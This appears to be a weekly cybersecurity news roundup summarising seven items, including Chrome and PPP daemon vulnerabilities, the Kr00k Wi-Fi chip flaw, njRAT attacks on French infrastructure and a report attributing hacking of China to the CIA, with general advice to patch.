This week had all the juicy cyber news stories that we could ask for; from high vulnerability patches and SCADA systems attacks to CIA espionage. Let's take a look at what happened in more detail.
1.Google Chrome bugs
Google has released a new critical software update for its Chrome Browser that includes fixes for some high severity vulnerabilities. One of these vulnerabilities could if exploited, allow attackers to execute arbitrary code on a target system; while the other bugs can potentially allow a remote attacker to exploit a heap corruption vulnerability using specially crafted HTML. We highly recommended that all users of the Google Chrome browser download and install the latest version of the software.
2.WI-FI encryption Vulnerability Affects Billions of devices.
Another thing that got the Cyber Security community talking this past week was the discovery of the "Kr00ks" vulnerability. This vulnerability resides in the widely used Wi-Fi chips manufactured by Broadcom and Cypress. It is a flaw that could let nearby remote attackers intercept and decrypt some wireless network packets transmitted over the air by a vulnerable device. Something important to note is that the vulnerability does not reside in the WI-FI encryption protocols but rather in the way that the vulnerable chips implemented the encryption.
As Cyber Security professionals, we remind you that in the case of new vulnerability discovery, keeping your equipment up to date is the best way to maintain the integrity, availability and confidentiality of your data.
3.French Critical Infrastructures attack.
As reported from KrebsOnSecurity, a large number of critical infrastructure firms in France were hacked as part of a large scale campaign launched by Morocco-based hackers. The attacker used a malware known as njRAT or Bladabindi. It affected multiple targets including, a national power company, an automobile manufacturer, a major Bank, companies that cooperate with the French postal and transportation systems, a domestic firm that operates several airports, a state-owned railway company and multiple nuclear facilities.
Even though this attack was only beaconing data to a foreign location and not doing anything that would cause damage, SCADA attacks should always be a reminder of the dangers that might come. We hope this serves as motivation for governments to invest in Cyber Security to harden their critical infrastructures as much as they possibly can.
4.CIA behind an 11-Year-Long Hacking attack against China
Qihoo 360, a Chinese internet security company has published a report accusing the U.S Central Intelligence Agency to be behind an 11-year-old hacking campaign against Chinese aviation and energy sectors as well as government agencies and internet companies. According to Qihoo 360, there are some similarities between previously known CIA attacks and the ones on Chinese infrastructure, which created some suspicion. This is not the first time a hacking campaign has been linked to the CIA since Kaspersky and Symantec have also tracked the agency backing various hacking operations against other countries.
5.Lets Encrypt Vulnerability
A bug was found in one of the most widely used digital certificate authorities on the internet named "Lets Encrypt". ISRG (internet security research group), the group behind "Let's Encrypt" and a significant part of the security infrastructure of the web notified its clients that they discovered a bug hidden in the certificate authority code. The affected certificates needed to be renewed by Wednesday, March 4.
6.Malware-free attacks domination
As reported from Crowdstrike, malware-free attacks surpassed the volume of malware attacks in 2019. Like the old days, malware-free attacks bring back the hacker behind-the-keyboard concept and the practice of techniques like command-line interface, PowerShell, and hiding files and directories. Experts worry that if this continues, security tools and the targeted organisation will be overwhelmed and unable to counter them.
7. Critical PPP Daemon Flaw
The discovery of a 17-year-old remote code execution vulnerability residing on almost all Linux based operating systems as well as other networking devices has caused panic in the cybersecurity community. This newly discovered vulnerability affects the PPP daemon software that enables communication and data transfer between nodes and is very widely used in DSL broadband connections and VPNs. Users with affected operating systems and devices need to apply security patches as soon as they become available.